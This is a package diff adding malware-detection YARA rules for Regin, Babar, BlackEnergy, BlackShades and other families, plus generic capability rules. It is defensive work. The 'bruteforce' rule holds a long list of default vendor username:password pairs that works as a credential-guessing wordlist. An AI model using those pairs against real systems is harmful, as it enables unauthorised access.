+	    description = "Rule to detect Regin's Hopscotch module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "6c34031d7a5fc2b091b623981a8ae61c"
+	strings:
+
+	    $mz="MZ"
+
+	    $a1="AuthenticateNetUseIpc"
+	    $a2="Failed to authenticate to"
+	    $a3="Failed to disconnect from"
+	    $a4="%S\\ipc$" wide
+	    $a5="Not deleting..."
+	    $a6="CopyServiceToRemoteMachine"
+	    $a7="DH Exchange failed"
+	    $a8="ConnectToNamedPipes"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+
+rule apt_regin_2011_32bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 32 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={331015EA261D38A7}
+$key2={9145A98BA37617DE}
+$key3={EF745F23AA67243D}
+$mz="MZ"
+condition:
+($mz at 0) and any of ($key*) and filesize < 300000
+}
+rule apt_regin_rc5key {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin RC5 decryption keys"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01}
+$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78}
+condition:
+any of ($key*)
+}
+
+rule apt_regin_vfs {
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin VFSes"
+	version = "1.0"
+	last_modified = "2014-11-18"
+strings:
+	$a1={00 02 00 08 00 08 03 F6 D7 F3 52}
+	$a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
+	$a3={00 04 00 10 00 10 03 C2 D3 1C 93}
+	$a4={00 04 00 10 C8 00 04 C8 93 06 D8}
+condition:
+	($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
+}
+
+rule apt_regin_dispatcher_disp_dll {
+
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin disp.dll dispatcher"
+	version = "1.0"
+	last_modified = "2014-11-18"
+
+strings:
+	$mz="MZ"
+	$string1="shit"
+	$string2="disp.dll"
+	$string3="255.255.255.255"
+	$string4="StackWalk64"
+	$string5="imagehlp.dll"
+condition:
+	($mz at 0) and (all of ($string*))
+}
+
+rule apt_regin_2013_64bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 64 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+ filename="wshnetc.dll"
+ md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
+ filename="wsharp.dll"
+ md5="c053a0a3f1edcbbfc9b51bc640e808ce"
+strings:
+$mz="MZ"
+$a1="PRIVHEAD"
+$a2="\\\\.\\PhysicalDrive%d"
+$a3="ZwDeviceIoControlFile"
+condition:
+($mz at 0) and (all of ($a*)) and filesize < 100000
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Babar.yara remnux-rules-0.0.4/yara.old/Babar.yara
--- remnux-rules-0.0.3/yara.old/Babar.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Babar.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SNOWGLOBE_Babar_Malware {
+	meta:
+		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+		author = "Florian Roth"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		date = "2015/02/18"
+		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+		score = 80
+	strings:
+		$mz = { 4d 5a }
+		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+		$z2 = "ExecQueryFailled!" fullword ascii
+		$z3 = "NBOT_COMMAND_LINE" fullword
+		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+
+		$s1 = "/s /n %s \"%s\"" fullword ascii
+		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s3 = "/c start /wait " fullword ascii
+		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+		$x2 = "%COMMON_APPDATA%" fullword ascii
+		$x4 = "CONOUT$" fullword ascii
+		$x5 = "cmd.exe" fullword ascii
+		$x6 = "DLLPATH" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 1MB and
+		(
+			( 1 of ($z*) and 1 of ($x*) ) or
+			( 3 of ($s*) and 4 of ($x*) )
+		)
+}
diff -Nru remnux-rules-0.0.3/yara.old/Bangat.yara remnux-rules-0.0.4/yara.old/Bangat.yara
--- remnux-rules-0.0.3/yara.old/Bangat.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Bangat.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BangatCode : Bangat Family 
+{
+    meta:
+        description = "Bangat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // dec [ebp + procname], push eax, push edx, call get procaddress
+        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
+    
+    condition:
+        any of them
+}
+
+rule BangatStrings : Bangat Family
+{
+    meta:
+        description = "Bangat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $lib1 = "DreatePipe"
+        $lib2 = "HetSystemDirectoryA"
+        $lib3 = "SeleaseMutex"
+        $lib4 = "DloseWindowStation"
+        $lib5 = "DontrolService"
+        $file = "~hhC2F~.tmp"
+        $mc = "~_MC_3~"
+
+    condition:
+       all of ($lib*) or $file or $mc
+}
+
+rule Bangat : Family
+{
+    meta:
+        description = "Bangat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        BangatCode or BangatStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/BlackEnergy.yara remnux-rules-0.0.4/yara.old/BlackEnergy.yara
--- remnux-rules-0.0.3/yara.old/BlackEnergy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/BlackEnergy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackEnergy_BE_2 {
+        meta:
+                description = "Detects BlackEnergy 2 Malware"
+                author = "Florian Roth"
+                reference = "http://goo.gl/DThzLz"
+                date = "2015/02/19"
+                hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+        strings:
+                $mz = { 4d 5a }
+                $s0 = "<description> Windows system utility service  </description>" fullword ascii
+                $s1 = "WindowsSysUtility - Unicode" fullword wide
+                $s2 = "msiexec.exe" fullword wide
+                $s3 = "WinHelpW" fullword ascii
+                $s4 = "ReadProcessMemory" fullword ascii
+        condition:
+                ( $mz at 0 ) and filesize < 250KB and all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/BlackShades.yara remnux-rules-0.0.4/yara.old/BlackShades.yara
--- remnux-rules-0.0.3/yara.old/BlackShades.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/BlackShades.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,118 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackShades_3 : Trojan
+{
+    meta:
+        description = "BlackShades RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $mod1 = /(m)odAPI/
+        $mod2 = /(m)odAudio/
+        $mod3 = /(m)odBtKiller/
+        $mod4 = /(m)odCrypt/
+        $mod5 = /(m)odFuctions/
+        $mod6 = /(m)odHijack/
+        $mod7 = /(m)odICallBack/
+        $mod8 = /(m)odIInet/
+        $mod9 = /(m)odInfect/
+        $mod10 = /(m)odInjPE/
+        $mod11 = /(m)odLaunchWeb/
+        $mod12 = /(m)odOS/
+        $mod13 = /(m)odPWs/
+        $mod14 = /(m)odRegistry/
+        $mod15 = /(m)odScreencap/
+        $mod16 = /(m)odSniff/
+        $mod17 = /(m)odSocketMaster/
+        $mod18 = /(m)odSpread/
+        $mod19 = /(m)odSqueezer/
+        $mod20 = /(m)odSS/
+        $mod21 = /(m)odTorrentSeed/
+
+        $tmr1 = /(t)mrAlarms/
+        $tmr2 = /(t)mrAlive/
+        $tmr3 = /(t)mrAnslut/
+        $tmr4 = /(t)mrAudio/
+        $tmr5 = /(t)mrBlink/
+        $tmr6 = /(t)mrCheck/
+        $tmr7 = /(t)mrCountdown/
+        $tmr8 = /(t)mrCrazy/
+        $tmr9 = /(t)mrDOS/
+        $tmr10 = /(t)mrDoWork/
+        $tmr11 = /(t)mrFocus/
+        $tmr12 = /(t)mrGrabber/
+        $tmr13 = /(t)mrInaktivitet/
+        $tmr14 = /(t)mrInfoTO/
+        $tmr15 = /(t)mrIntervalUpdate/
+        $tmr16 = /(t)mrLiveLogger/
+        $tmr17 = /(t)mrPersistant/
+        $tmr18 = /(t)mrScreenshot/
+        $tmr19 = /(t)mrSpara/
+        $tmr20 = /(t)mrSprid/
+        $tmr21 = /(t)mrTCP/
+        $tmr22 = /(t)mrUDP/
+        $tmr23 = /(t)mrWebHide/
+
+    condition:    
+        10 of ($mod*) or 10 of ($tmr*)
+}
+
+rule BlackShades2 : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
+rule BlackShades_4 : rat
+{
+	meta:
+		description = "BlackShades"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
+		$b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
+		$c = { 62 73 73 5F 73 65 72 76 65 72 }
+		$d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
+		$e = { 6D 6F 64 49 6E 6A 50 45 }
+		$apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
+
+	condition:
+		any of ($a, $b, $c, $d, $e) or $apikey		
+}
+
+
+rule BlackShades : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Bolonyokte.yara remnux-rules-0.0.4/yara.old/Bolonyokte.yara
--- remnux-rules-0.0.3/yara.old/Bolonyokte.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Bolonyokte.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bolonyokte : rat 
+{
+	meta:
+		description = "UnknownDotNet RAT - Bolonyokte"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$campaign1 = "Bolonyokte" ascii wide
+		$campaign2 = "donadoni" ascii wide
+		
+		$decoy1 = "nyse.com" ascii wide
+		$decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
+		$decoy3 = "bf13-5d45cb40" ascii wide
+		
+		$artifact1 = "Backup.zip"  ascii wide
+		$artifact2 = "updates.txt" ascii wide
+		$artifact3 = "vdirs.dat" ascii wide
+		$artifact4 = "default.dat"
+		$artifact5 = "index.html"
+		$artifact6 = "mime.dat"
+		
+		$func1 = "FtpUrl"
+		$func2 = "ScreenCapture"
+		$func3 = "CaptureMouse"
+		$func4 = "UploadFile"
+
+		$ebanking1 = "Internet Banking" wide
+		$ebanking2 = "(Online Banking)|(Online banking)"
+		$ebanking3 = "(e-banking)|(e-Banking)" nocase
+		$ebanking4 = "login"
+		$ebanking5 = "en ligne" wide
+		$ebanking6 = "bancaires" wide
+		$ebanking7 = "(eBanking)|(Ebanking)" wide
+		$ebanking8 = "Anmeldung" wide
+		$ebanking9 = "internet banking" nocase wide
+		$ebanking10 = "Banking Online" nocase wide
+		$ebanking11 = "Web Banking" wide
+		$ebanking12 = "Power"
+
+	condition:
+		any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/Boouset.yara remnux-rules-0.0.4/yara.old/Boouset.yara
--- remnux-rules-0.0.3/yara.old/Boouset.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Boouset.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BoousetCode : Boouset Family 
+{
+    meta:
+        description = "Boouset code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
+        
+    condition:
+        any of them
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Bublik_downloader.yara remnux-rules-0.0.4/yara.old/Bublik_downloader.yara
--- remnux-rules-0.0.3/yara.old/Bublik_downloader.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Bublik_downloader.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bublik : Downloader
+{
+	meta:
+		author="Kevin Falcoz"
+		date="29/09/2013"
+		description="Bublik Trojan Downloader"
+		
+	strings:
+		$signature1={63 6F 6E 73 6F 6C 61 73}
+		$signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69}
+		
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara.old/capabilities.yara remnux-rules-0.0.4/yara.old/capabilities.yara
--- remnux-rules-0.0.3/yara.old/capabilities.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/capabilities.yara	2015-05-08 13:22:52.000000000 +0000
@@ -0,0 +1,1846 @@
+rule write_msr
+{
+    meta:
+    description = "Writing MSR"
+
+    
+    strings:
+    /* 
+        mov ecx, [ebp+??]
+        mov eax, [ebp+??]
+        mov edx, [ebp+??]
+        wrmsr 
+    */
+    $wr1 = {8B 4D ?? 8B 55 ?? 8B 45 ?? 0F 30}
+    $wr2 = {8B 4D ?? 8B 45 ?? 8B 55 ?? 0F 30}
+    $wr3 = {8B 55 ?? 8B 4D ?? 8B 45 ?? 0F 30}
+    $wr4 = {8B 55 ?? 8B 45 ?? 8B 4D ?? 0F 30}
+    $wr5 = {8B 45 ?? 8B 55 ?? 8B 4D ?? 0F 30}
+    $wr6 = {8B 45 ?? 8B 4D ?? 8B 55 ?? 0F 30}
+    /* 
+        mov ecx, imm32
+        mov eax, imm32
+        mov edx, imm32
+        wrmsr
+    */
+    $wr7 = {B8 ?? ?? ?? BA ?? ?? ?? B9 ?? ?? ?? 0F 30}
+    $wr8 = {B8 ?? ?? ?? B9 ?? ?? ?? BA ?? ?? ?? 0F 30}
+    $wr9 = {B9 ?? ?? ?? B8 ?? ?? ?? BA ?? ?? ?? 0F 30}
+    $wra = {B9 ?? ?? ?? BA ?? ?? ?? B8 ?? ?? ?? 0F 30}
+    $wrb = {BA ?? ?? ?? B8 ?? ?? ?? B9 ?? ?? ?? 0F 30}
+    $wrc = {BA ?? ?? ?? B9 ?? ?? ?? B8 ?? ?? ?? 0F 30}
+    
+    condition:
+    any of them
+}
+
+rule embedded_exe 
+{
+    meta:
+    description = "Detects embedded executables"
+    
+    strings:
+    $a = "This program cannot be run in DOS mode"
+    
+    condition:
+    $a in (1024..filesize)
+}
+
+rule vmdetect 
+{
+    meta:
+    description = "Indicates attempt to detect VMs"
+    
+    strings:
+    $vm0 = "VIRTUAL HD" nocase
+    $vm1 = "VMWARE VIRTUAL IDE HARD DRIVE" nocase
+    $vm2 = "QEMU HARDDISK" nocase
+    $vm3 = "VBOX HARDDRIVE" nocase
+    $vm4 = "The Wireshark Network Analyzer" 
+    $vm5 = "C:\\sample.exe"
+    $vm6 = "C:\\windows\\system32\\sample_1.exe"
+    $vm7 = "Process Monitor - Sysinternals: www.sysinternals.com" 
+    $vm8 = "File Monitor - Sysinternals: www.sysinternals.com" 
+    $vm9 = "Registry Monitor - Sysinternals: www.sysinternals.com"
+    
+    condition:
+    any of them
+}
+
+rule encoding 
+{ 
+    meta: 
+    description = "Indicates encryption/compression"
+    
+    strings:
+    $zlib0 = "deflate" fullword
+    $zlib1 = "Jean-loup Gailly"
+    $zlib2 = "inflate" fullword
+    $zlib3 = "Mark Adler"
+    
+    $ssl0 = "OpenSSL" fullword
+    $ssl1 = "SSLeay" fullword
+    
+    condition:
+    (all of ($zlib*)) or (all of ($ssl*))
+}
+
+rule irc
+{
+    meta:
+    description = "Indicates use of IRC"
+    
+    strings:
+    $irc0 = "join" nocase fullword
+    $irc1 = "msg" nocase fullword
+    $irc2 = "nick" nocase fullword
+    $irc3 = "notice" nocase fullword
+    $irc4 = "part" nocase fullword
+    $irc5 = "ping" nocase fullword
+    $irc6 = "quit" nocase fullword
+    $irc7 = "chat" nocase fullword
+    $irc8 = "privmsg" nocase fullword
+    
+    condition:
+    4 of ($irc*)
+}   
+
+rule sniffer 
+{ 
+    meta:
+    description = "Indicates network sniffer"
+    
+    strings:
+    $sniff0 = "sniffer" nocase fullword
+    $sniff1 = "rpcap:////" nocase
+    $sniff2 = "wpcap.dll" nocase fullword
+    $sniff3 = "pcap_findalldevs" nocase
+    $sniff4 = "pcap_open" nocase
+    $sniff5 = "pcap_loop" nocase
+    $sniff6 = "pcap_compile" nocase
+    $sniff7 = "pcap_close" nocase
+ 
+    condition:
+    any of them
+}
+
+rule spam 
+{
+    meta:
+    description = "Indicates spam-related activity"
+    
+    strings:
+    $spam0000 = "invitation card" nocase
+    $spam0002 = "shipping documents" nocase
+    $spam0003 = "e-cards@hallmark.com" nocase
+    $spam0004 = "invitations@twitter.com" nocase
+    $spam0005 = "invitations@hi5.com" nocase
+    $spam0006 = "order-update@amazon.com" nocase
+    $spam0007 = "hallmark e-card" nocase
+    $spam0008 = "invited you to twitter" nocase
+    $spam0009 = "friend on hi5" nocase
+    $spam000a = "shipping update for your amazon.com" nocase
+    $spam000b = "rcpt to:" nocase
+    $spam000c = "mail from:" nocase
+    $spam000d = "smtp server" nocase 
+    $spam000e = "mx record" nocase
+    $spam000f = "cialis" nocase fullword
+    $spam0010 = "pharma" nocase fullword
+    $spam0011 = "casino" nocase fullword
+    $spam0012 = "ehlo " nocase fullword
+    $spam0013 = "from: " nocase fullword
+    $spam0014 = "subject: " nocase fullword
+    $spam0015 = "Content-Disposition: attachment;" nocase
+    $spam0016 = "postcard" nocase fullword
+    
+    condition:
+    3 of ($spam*)
+}
+
+rule bruteforce
+{
+    meta:
+    description = "Indicates attempt to brute force passwords"
+    
+    strings:
+    $br0 = "winpass" fullword nocase
+    $br1 = "orainstall" fullword nocase
+    $br2 = "sqlpassoainstall" fullword nocase
+    $br3 = "db1234" fullword nocase
+    $br4 = "databasepassword" fullword nocase
+    $br5 = "databasepass" fullword nocase
+    $br6 = "dbpassword" fullword nocase
+    $br7 = "dbpass" fullword nocase
+    $br8 = "domainpassword" fullword nocase
+    $br9 = "domainpass" fullword nocase
+    $br10 = "exchange" fullword nocase
+    $br11 = "loginpass" fullword nocase
+    $br12 = "win2000" fullword nocase
+    $br13 = "windows" fullword nocase
+    $br14 = "oeminstall" fullword nocase
+    $br15 = "accounting" fullword nocase
+    $br16 = "accounts" fullword nocase
+    $br17 = "letmein" fullword nocase
+    $br18 = "outlook" fullword nocase
+    $br19 = "qwerty" fullword nocase
+    $br20 = "temp123" fullword nocase
+    $br21 = "default" fullword nocase
+    $br22 = "changeme" fullword nocase
+    $br23 = "secret" fullword nocase
+    $br24 = "payday" fullword nocase
+    $br25 = "deadline" fullword nocase
+    $br26 = "1234567890" fullword nocase
+    $br27 = "123456789" fullword nocase
+    $br28 = "12345678" fullword nocase
+    $br29 = "1234567" fullword nocase
+    $br30 = "123456" fullword nocase
+    $br31 = "pass1234" fullword nocase
+    $br32 = "passwd" fullword nocase
+    $br33 = "password" fullword nocase
+    $br34 = "password1" fullword nocase
+    $br35 = "admin:" nocase
+    $br36 = "admin:123456" nocase
+    $br37 = "admin:password" nocase
+    $br38 = "admin:admin" nocase
+    $br39 = "!root:" nocase
+    $br40 = "zxc:cascade" nocase
+    $br41 = "11111:x-admin" nocase
+    $br42 = "1234:1234" nocase
+    $br43 = "1500:and" nocase
+    $br45 = "1502:1502" nocase
+    $br46 = ":12345" nocase
+    $br47 = ":1234admin" nocase
+    $br48 = ":3ascotel" nocase
+    $br49 = ":4getme2" nocase
+    $br50 = ":BRIDGE" nocase
+    $br51 = ":Cisco" nocase
+    $br52 = ":Intel" nocase
+    $br54 = ":SUPER" nocase
+    $br56 = ":TANDBERG" nocase
+    $br57 = ":TENmanUFactOryPOWER" nocase
+    $br58 = ":Telecom" nocase
+    $br59 = ":_Cisco" nocase
+    $br60 = ":access" nocase
+    $br61 = ":admin" nocase
+    $br62 = ":ascend" nocase
+    $br63 = ":atc123" nocase
+    $br64 = ":cisco" nocase
+    $br65 = ":connect" nocase fullword
+    $br66 = ":default" nocase fullword
+    $br67 = ":enter" nocase
+    $br68 = ":epicrouter" nocase
+    $br69 = ":hs7mwxkk" nocase
+    $br70 = ":letmein" nocase
+    $br71 = ":medion" nocase
+    $br72 = ":nokia" nocase
+    $br73 = ":password" nocase fullword
+    $br74 = ":pento" nocase
+    $br75 = ":public" nocase fullword
+    $br76 = ":secret" nocase fullword
+    $br77 = ":sitecom" nocase
+    $br78 = ":smcadmin" nocase
+    $br79 = ":administrator" nocase
+    $br80 = ":speedxess" nocase
+    $br81 = ":sysadm" nocase
+    $br82 = ":system" nocase fullword
+    $br83 = "ADMINISTRATOR:ADMINISTRATOR" nocase
+    $br84 = "ADMN:admn" nocase
+    $br85 = "ADSL:expert03" nocase
+    $br86 = "ADVMAIL:HP" nocase
+    $br87 = "ADVMAIL:HPOFFICE" nocase
+    $br89 = "Admin:" nocase
+    $br90 = "Admin:123456" nocase
+    $br91 = "Admin:admin" nocase
+    $br92 = "Administrator:" nocase
+    $br93 = "Administrator:3ware" nocase
+    $br94 = "Administrator:admin" nocase
+    $br95 = "Administrator:changeme" nocase
+    $br96 = "Administrator:ganteng" nocase
+    $br97 = "Administrator:password" nocase
+    $br98 = "Administrator:pilou" nocase
+    $br99 = "Administrator:smcadmin" nocase
+    $br100 = "Any:12345" nocase
+    $br101 = "CISCO15:otbu+1" nocase
+    $br102 = "CSG:SESAME" nocase
+    $br103 = "Cisco:Cisco" nocase
+    $br104 = "FIELD:HPONLY" nocase
+    $br105 = "FIELD:HPP187" nocase
+    $br107 = "FIELD:HPWORD" nocase
+    $br109 = "FIELD:LOTUS" nocase
+    $br110 = "FIELD:MANAGER" nocase
+    $br111 = "FIELD:MGR" nocase
+    $br112 = "FIELD:SERVICE" nocase
+    $br113 = "FIELD:SUPPORT" nocase
+    $br114 = "Factory:56789" nocase
+    $br115 = "GEN1:gen1" nocase
+    $br116 = "GEN2:gen2" nocase
+    $br117 = "Gearguy:Geardog" nocase
+    $br118 = "HELLO:FIELD.SUPPORT" nocase
+    $br119 = "HELLO:MANAGER.SYS" nocase
+    $br120 = "HELLO:MGR.SYS" nocase
+    $br121 = "HELLO:OP.OPERATOR" nocase
+    $br122 = "HTTP:HTTP" nocase
+    $br123 = "IntraStack:Asante" nocase
+    $br124 = "IntraSwitch:Asante" nocase
+    $br125 = "MAIL:HPOFFICE" nocase
+    $br126 = "MAIL:MAIL" nocase
+    $br127 = "MAIL:MPE" nocase
+    $br128 = "MAIL:REMOTE" nocase
+    $br129 = "MAIL:TELESUP" nocase
+    $br130 = "MANAGER:COGNOS" nocase
+    $br131 = "MANAGER:HPOFFICE" nocase
+    $br132 = "MANAGER:ITF3000" nocase
+    $br133 = "MANAGER:SECURITY" nocase
+    $br134 = "MANAGER:SYS" nocase
+    $br135 = "MANAGER:TCH" nocase
+    $br136 = "MANAGER:TELESUP" nocase
+    $br137 = "MDaemon:MServer" nocase
+    $br138 = "MGR:CAROLIAN" nocase
+    $br139 = "MGR:CCC" nocase
+    $br140 = "MGR:CNAS" nocase
+    $br141 = "MGR:COGNOS" nocase
+    $br142 = "MGR:CONV" nocase
+    $br143 = "MGR:HPDESK" nocase
+    $br144 = "MGR:HPOFFICE" nocase
+    $br145 = "MGR:HPONLY" nocase
+    $br146 = "MGR:HPP187" nocase
+    $br147 = "MGR:HPP189" nocase
+    $br148 = "MGR:HPP196" nocase
+    $br149 = "MGR:INTX3" nocase
+    $br150 = "MGR:ITF3000" nocase
+    $br151 = "MGR:NETBASE" nocase
+    $br152 = "MGR:REGO" nocase
+    $br153 = "MGR:RJE" nocase
+    $br154 = "MGR:ROBELLE" nocase
+    $br155 = "MGR:SECURITY" nocase
+    $br156 = "MGR:SYS" nocase
+    $br157 = "MGR:TELESUP" nocase
+    $br158 = "MGR:VESOFT" nocase
+    $br159 = "MGR:WORD" nocase
+    $br160 = "MGR:XLSERVER" nocase
+    $br161 = "MICRO:RSX" nocase
+    $br162 = "Manager:" nocase
+    $br163 = "Manager:friend" nocase
+    $br164 = "NAU:NAU" nocase
+    $br165 = "NICONEX:NICONEX" nocase
+    $br166 = "OPERATOR:COGNOS" nocase
+    $br167 = "OPERATOR:DISC" nocase
+    $br168 = "OPERATOR:SUPPORT" nocase
+    $br169 = "OPERATOR:SYS" nocase
+    $br170 = "OPERATOR:SYSTEM" nocase
+    $br171 = "PCUSER:SYS" nocase
+    $br172 = "PRODDTA:PRODDTA" nocase
+    $br173 = "Polycom:456" nocase
+    $br174 = "Polycom:SpIp" nocase
+    $br175 = "RMUser1:password" nocase
+    $br176 = "RSBCMON:SYS" nocase
+    $br177 = "SPOOLMAN:HPOFFICE" nocase
+    $br178 = "SSA:SSA" nocase
+    $br179 = "SYSADM:sysadm" nocase
+    $br180 = "SYSDBA:masterkey" nocase
+    $br181 = "Service:5678" nocase
+    $br182 = "TMAR#HWMT8007079:" nocase
+    $br183 = "USERID:PASSW0RD" nocase
+    $br184 = "User:Password" nocase
+    $br185 = "WP:HPOFFICE" nocase
+    $br186 = "aaa:often" nocase
+    $br188 = "admin2:changeme" nocase
+    $br189 = "admin:" nocase
+    $br190 = "admin:0" nocase
+    $br191 = "admin:1111" nocase
+    $br192 = "admin:123" nocase
+    $br193 = "admin:1234" nocase
+    $br194 = "admin:12345" nocase
+    $br195 = "admin:123456" nocase
+    $br196 = "admin:1234admin" nocase
+    $br197 = "admin:2222" nocase
+    $br198 = "admin:22222" nocase
+    $br199 = "admin:Ascend" nocase
+    $br200 = "admin:NetCache" nocase
+    $br201 = "admin:NetSurvibox" nocase
+    $br202 = "admin:OCS" nocase
+    $br203 = "admin:OkiLAN" nocase
+    $br204 = "admin:P@55w0rd!" nocase
+    $br205 = "admin:Password" nocase
+    $br206 = "admin:Protector" nocase
+    $br207 = "admin:Sharp" nocase
+    $br208 = "admin:access" nocase
+    $br209 = "admin:admin" nocase
+    $br210 = "admin:admin123" nocase
+    $br211 = "admin:administrator" nocase
+    $br212 = "admin:adslolitec" nocase
